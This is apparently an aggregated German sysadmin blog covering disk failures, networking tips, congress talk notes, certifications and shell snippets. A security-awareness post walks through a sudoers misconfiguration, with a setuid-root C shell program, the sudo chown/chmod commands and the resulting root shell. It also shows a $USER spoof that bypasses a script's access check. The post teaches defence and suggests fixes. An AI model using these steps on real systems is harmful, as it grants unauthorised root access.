Diejenigen, die den Blog über Feedreader abonniert hatten: hier kommt nichts mehr, weiter gehts auf ADMinLIFE. Also los: Reader umstellen!

Achtung: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht.

Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch – wir schicken nie direkt zu WD, weil wir teils Platten im Vorabaustausch bekommen. Er hat jedenfalls eine größere Menge defekte Festplatten weitergeleitet und nun haben wir für einige Platten als Ersatz 500 GB Modelle bekommen – für lau. Man munkelt, dass aufgrund der extrem hohen Rücklaufzahlen der Bedarf an 250ern derzeit nicht gedeckt werden kann.

Es bleibt spannened. Sobald ich etwas genaueres weiß, werde ich hier was schreiben.

Edit: Falls bei euch in letzter Zeit auch viel ausgefallen ist, schreibt bitte das Alter der Festplatten dazu!

Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat!

Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt:




#!/bin/bash
if [ "$USER" != "franz" ] && [ "$USER" != "karl" ]
then
echo "Zugriff verweigert."
else
[...]
echo "$(date) Domain $1 gelöscht durch $USER" >> /var/log/domainlog
fi


Wichtig ist hier vor allem das Audit Log. Umgehen kann man es jedoch trivial:

USER=franz ./domain-delete.sh [domain]


Leider bedachte der Programmierer nicht, dass $USER natürlich trivial von jedem Shelluser geändert werden kann. Das Audit-Log würde ggfs. sehr unerfreuliche Folgen haben.

Bessere Lösung: sudo benutzen und nur den zwei Usern, die es wirklich benötigen, Rechte auf das Script gewähren.

Auf einem Webserver fand ich kürzlich eine sudoers-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden.

user@srv2342: ~> id
uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users)



Ich brauche zuerst ein kleines C-Tool:

user@srv2342: ~> cat > /foo/y.c
#include
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
STRG-D


Compilieren:

user@srv2342:/foo> cd /foo; gcc y.c -o y


Jetzt machen wir sudo-magic und erhalten ein SetUID-Bit:

user@srv2342:/foo> sudo /bin/chown 0:0 /foo/y
user@srv2342:/foo> sudo /bin/chmod 4775 /foo/y
user@srv2342:/foo ls -l
total 16
-rwsrwxr-x 1 root root 9217 Mar 26 14:52 y
-rw-r----- 1 user users 101 Mar 26 14:51 y.c


Root werden:

user@srv2342:/foo> ./y
srv2342:/foo # id
uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)

Owned!

Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210.

/etc/rc.conf:

ifconfig_em0="inet 192.168.0.220 192.168.0.210"
static_routes="default"
route_default="-net 0.0.0.0 -iface -interface em0"

Ist auf der anderen Seite Linux im Einsatz, so macht man dort:

ip addr add 192.168.0.210 peer 192.168.0.220/32 dev tunX

Natürlich erst, nachdem das neue tun-Interface oben ist (also z.B. im eigenen up-Script).

Und zwar:

- 2 Asus AM2 Boards (Alternate): jeweils mit defektem Spannungswandler

- MSI-AM2 Motherboard (Alternate): der Lüfter läuft nach 1-2 Wochen zu schnell, da das Board dann falsche Sensorwerte über die Temperatur meldet

- Komplett-PC Sockel 775 (Mindfactory): diverse BIOS-Einstellungen falsch (DANKE an Mindfactory dafür, System war so nicht lauffähig) defekter Spannungswandler des Mainbords (Gigabyte)

- Bundle (Alternate): Asrock AM3 Board, DDR3, x2 250 von Alternate: Spring nichtmal an, kein BIOS-Piepser…

*Seufz*. Vor allem die extrem laut fiependen Spannungswandlern sind echt nervig – bei Asus scheinen einige Serien komplett davon betroffen zu sein.
Allgemein habe ich so das Gefühl, dass die Qualität und Kompatibilität der PC-Komponenten ab der DDR2-Genaration deutlich abgenommen hat…

Microsoft und Asus haben eine neue Pro-Windows / Anti-Linux Kampagne mit dem Namen “It’s better with Windows” ins Leben gerufen. Leider lässt sich das Video auf der offiziellen Seite nicht abrufen, da die FLV Datei nicht mehr auf dem Server existiert. Daher ein Link zur YouTube Version des Videos.

[code language="css"]
+-------------------------------------------------+
| 640x480 800x600 1024x768 1280x1024
----+--------------------------------------------
256 | 0x301=769 0x303=771 0x305=773 0x307=775
32K | 0x310=784 0x313=787 0x316=790 0x319=793
64K | 0x311=785 0x314=788 0x317=791 0x31A=794
16M | 0x312=786 0x315=789 0x318=792 0x31B=795
+-------------------------------------------------+
[/code]

Noch mehr Codes gibt es bei Wikipedia.

Die Bahn hatte einen bundesweite Störung ihrer Computersysteme zu beklagen, der massive Störungen beim Fahrkartenverkauf und der Zugabfertigung mit sich brachte. So weit so gut. Das Problem ist bisher allerdings noch nicht ausgemacht, für die Bahn selbst ist das Problem noch “mysteriös” – ihr Sprecher verkündete aber sogleich, dass so ein Ausfall nicht nochmal vorkommen werde!

Mutig!

Wild Guess: ein von einem Bahnarbeiter per USB-Stick eingeschleuster Wurm hat im internen Netz (“muss man ja nicht patchen, kommt ja keiner ran!”) etwas gewütet…

Quelle: Tagesschau

Erwähnenswert auch noch:

• Dunking Donuts DDoS
• Die Vortragenden des iPhone-Hacking-Vortrags sind auf dem Video aus offensichtlichen Gründen nicht zu sehen
• Der Wikileaks-Vortrag wurde garnicht aufgenommen, um die Privatsphäre der Vortragenden zu schützen
• Das LKA hat wohl (halbherzig und erfolglos) versucht, die Wikileaks-Leute wg. der BND-Geschichte zu verhaften, leider habe ich keine genaueren Details
• “Der Dritte Raum” hat unter falschem Namen in der Lounge aufgelegt!
• Der Serverraum des Hackcenters war wie immer das totale Chaos – frei nach dem Motto “Kabelsalat ist gesund!”

Rack mit Patchpanel und Core-Switches mit 10GE Uplinks für das Hackcenter:

SAN mit jeder Menge Plattenplatz:

Colocation für ein paar Server:

Achja…schön wars!

Noch ein paar weitere, gesehene Vorträge:

• Banking Trojans 101 – Thorsten Holz -> Eigentlich nur eine Zusammenfassung bereits bekannter Sachen…interessant war aber “then a mystery happens and we get access to the dropzone”, was auch nicht näher erläutert wurde…
• Fnord News Show – Felix von Leitner / Frank Rieger -> Genial wie immer! Jeder sollte ein paar Fnords sehen…mit am Besten war die Diebold-CIA-Koks-Connection!
• Cisco IOS attack and defense – FX of Phenoelit -> Outstanding. Wiedereinmal hat FX neue, Erkenntnisse zum IOS-Hacking publik gemacht. Jeder Netzwerker sollte sich den Talk ansehen!
• Hacker Jeopardy – Stefan ‘Sec’ Zehl / Ray -> Pure Fun, as usual!
• Security Nightmares 2009 – Frank Rieger / Ron -> Hoffentlich funktioniert die Glaskugel nicht korrekt…
• Closing Ceremony / Sandro Gaycken -> wie immer, die Interessante Zusammenfassung der Congressereignisse. Es wurde auch der komische Typ erwähnt, der im Hackcenter und am NOC Helpdesk Hacks gegen Geld kaufen wollte (und daraufhin mit einem “FED”-Schild markiert wurde *gg)

Einige weitere Streams habe ich mir im Hackcenter sitzend angehört, schreibe dazu jedoch erstmal nichts, weil ich einfach dauernd abgelenkt wurde…

Des weiteren war noch der Workshop Bastard ISPs from Hell bemerkenswert, darin ging es um Trafficmanipulationen, die durch ISPs vorgenommen werden können – das Ganze wurde dann auch noch testweise selbst durchgeführt…

• regelmäßige Beiträge
• weniger 1-Zeiler Beiträge, sondern mehr Qualität statt Quantität
• ein maßgeschneidertes Re-Design

Zum Jahresanfang noch was zum Schmunzeln: Der Year-2009-Bug – “It seems that every Zune on the planet has just frozen up and will not work”.

Ich befinde mich derzeit auf dem 25C3…gesehene Vorträge bisher:

• Why were we so vulnerable to the DNS vulnerability? – Dan Kaminsky -> Exzellent
• Attacking Rich Internet Applications – Stefano Di Paolo / Kuzo55 -> Inhalt war OK, allerdings etwas langweilig Vorgetragen – vor allem Stefano Di Paolos Italenglisch war grauenhaft und machte garkeinen Spass
• Vulnerability discovery in encrypted closed source PHP applications – Stefan Esser -> Exzellent, gute technische Details
• TCP Denial of Service – Fabian Yamaguchi -> Gut, wenngleich die Inhalte schon bekannt waren
• Banking Malware – Thorsten Holz -> Läuft grade

Es ist übrigens EXTREMST voll, die Dauertickets sind schon längst allesamt verkauft – wer bei Vorträgen einen Sitzplatz ergattert, darf sich glücklich schätzen! Bei einigen Vorträgen mußten auch Leute rausgeworfen werden, weil es zu voll war und alle Ausgänge komplett verstopft waren…
Es blieb ihnen wenigstens noch der Videostream, der übrigens erstaunlich stabil läuft.

…bin ich nun auch noch! Hurra²! Ich habe heute beide Prüfungen nacheinander sehr gut bestanden (und jeweils in einem Drittel der Zeit) und lehne mich nach dem Zertifikatsmarathon nun erstmal in Ruhe zurück. Nächste Woche gibt es erstmal Urlaub! Eigentlich fehlt mir noch der Cluster Administrator… Vorher ist aber wohl noch mein Hasskanidat LPIC-202 dran.

…bin ich seit heute morgen! Hurra! Ok, wahnsinnig schwer war es nicht, in 3 der 6 Bereiche hatte ich sogar 100%, wirklich schlecht war ich aber bei den SQL-Fragen, die wohl eher für die Anwendungsentwickler gedacht waren. Naja egal, wieder ein Schein mehr!

[code language="css"]mysql> pager less
PAGER set to 'less'[/code]

Die MySQL Ausgabe wird nun an less übergeben und lässt sich so bequem Seite für Seite durcharbeiten. Jedes andere Linux / UNIX Kommando ist möglich, so dass sich ganz neue Möglichkeiten geben, wie Baron Schwartz im MySQL Performance Blog demonstriert.

Die Lücke lässt sich durch vorhersehbare Transaction IDs und Quellports ausnutzen, so dass Cache Poisoning möglich ist. Damit lassen sich die Antworten auf DNS Anfragen manipulieren, eine gute Erklärung bietet dieses PDF ab Seite 3.

Also, Updates einspielen und weiter die Ohren und Augen offen halten. Weitere Infos gibt es unter CVE-2008-1447 und securosis.com.

Youtube Video

Hier die Testergebnisse:
[sourcecode language="php"]OS Queries/second
Linux Gentoo 2.6.20.7 93,000
Linux Fedora Core 2.6.20.7 87,000
FreeBSD-7-CURRENT 200708 84,000
FreeBSD-6-stable 200708 55,000
FreeBSD 6.2-RELEASE 51,000
Solaris-10 DevelExpr 5/07 50,000
NetBSD-4.0-Beta 200708 42,000
OpenBSD 4.1-snap-20070427 35,000
Windows 2003 Server 22,000
Windows XP Pro64 5.2.3790 SP2 20,000[/sourcecode]

Ich persönlich hätte ja auch sowas vorausgesagt…

[sourcecode language="css"]cp_pv()
{
dst="$2"; if [ -d "$2" ]; then dst="$2/`basename $1`"; fi
dd if=$1 2>/dev/null|pv –size `/bin/ls -l $1|awk ‘{print $5}’`|dd of=$dst 2>/dev/null;
}[/sourcecode]
So gehts dann:
[sourcecode language="css"]cp_pv /opt/oracle/my.large.file.dmp /mnt/usb/[/sourcecode]
Und so sieht es aus:
[sourcecode language="css"][oracle@slowdbsrv ~]$ cp_pv /opt/oracle/my.large.file.dmp /mnt/usb/
74,6MB 0:00:11 [6,45MB/s] [=> ] 5% ETA 0:03:17[/sourcecode]

Damit das Ziel nicht vollständig angegeben werden muss, habe ich noch einen check eingebaut, durch den das es um den Dateinamen ergänzt wird, falls das 2. Argument beim Aufruf der Funktion ein Verzeichnis ist. Kein großes Kino, ich weiß – ich poste das hier für den geneigten BASH-Neuling und auch als reminder für mich selbst, wenn ich die Zeile mal brauche.

Auf den Fotos zu sehen:
- Ein kleiner Teil des Hackcenters vom 26.12. auf den 27.12.
- Gentoo auf dem Neo 1973 (leider ist die Schrift so klein und das Licht so schlecht, dass mankaum etwas erkennen kann).
- iPhone (auf dem Schild steht “free iPhone unlocking”) … ähm! Den Ansprechpartner auf dem 24C3 habe ich mal zensiert.
- “The Gentoo guys”